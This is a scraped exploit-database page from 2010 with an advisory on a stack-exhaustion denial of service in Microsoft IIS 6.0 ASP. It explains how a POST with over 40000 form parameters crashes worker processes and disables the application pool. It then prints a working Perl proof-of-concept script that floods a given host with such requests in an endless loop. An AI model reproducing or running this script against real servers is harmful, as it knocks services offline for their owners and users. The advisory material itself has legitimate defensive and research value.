[dos / poc] - Microsoft IIS 6.0 ASP Stack Overflow (Stack Ex
Posted on 01 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Microsoft IIS 6.0 ASP Stack Overflow (Stack Exhaustion) Denial of Service | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Microsoft IIS 6.0 ASP Stack Overflow (Stack Exhaustion) Denial of Service by Kingcope in dos / poc | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>=========================================================== Microsoft IIS 6.0 ASP Stack Overflow (Stack Exhaustion) DoS =========================================================== Affected Products Only Microsoft IIS 6.0 was tested successfully On a Windows Server 2003 SP2 System The System was NOT updated to the latest patches during testing. Since tests “in the wild†have shown the attack to be real this advisory was released. Vulnerability Details The vulnerability allows remote unauthenticated attackers to force the IIS server to become unresponsive until the IIS service is restarted manually by the administrator. Required is that Active Server Pages are hosted by the IIS and that an ASP script reads out a Post Form value. When the following ASP script is hosted by IIS the attacker can run the attack: <% Dim variable variable = Request.Form(“FOOBARâ€) %> This small script reads out a POST request argument from the client side. The exploit is simple: The attacker sends a POST request to the ASP site which reads out POST arguments. The POST request includes > 40000 request parameters and is sent in the form of an application/x-www-form-urlencoded encoding type. The result is that one IIS worker process crashes because of a stack overflow (here stack exhaustion). Tests have shown that five consecutive requests of this type will cause the default application pool to be disabled because of a series of failures of the IIS worker processes. The IIS shows a “Service Unavailable†response to requesting clients until the World Wide Web Publishing Service is restarted manually by the administrator. PoC Exploit # IIS 6.0 ASP DoS PoC # usage: perl IISdos.pl <host> <asp page> use IO::Socket; $|=1; $host = $ARGV[0]; $script = $ARGV[1]; while(1) { $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 'http(80)', Proto => 'tcp'); $write = "C=A&" x 40000; print $sock "HEAD /$script HTTP/1.1 Host: $host " ."Connection:Close Content-Type: application/x-www-form-urlencoded " ."Content-Length:". length($write) ." " . $write; print "."; while(<$sock>) { print; } } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-01]</pre></body></html>
